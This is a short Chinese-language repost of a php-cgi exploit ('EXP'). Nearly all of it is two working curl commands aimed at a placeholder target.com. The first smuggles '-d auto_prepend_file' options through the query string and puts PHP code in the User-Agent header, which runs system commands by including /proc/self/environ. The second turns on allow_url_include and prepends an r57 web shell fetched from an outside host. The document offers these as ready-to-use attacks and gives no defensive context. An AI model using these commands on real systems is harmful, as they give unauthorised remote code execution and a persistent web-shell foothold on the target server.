php-cgi漏洞利用EXP

转自：http://acmfly.blog.163.com/blog/static/184049084201242001024914/

1、本地包含直接执行代码: 

curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

 

2、远程包含执行代码: 

curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.sh3ll.org/r57.txt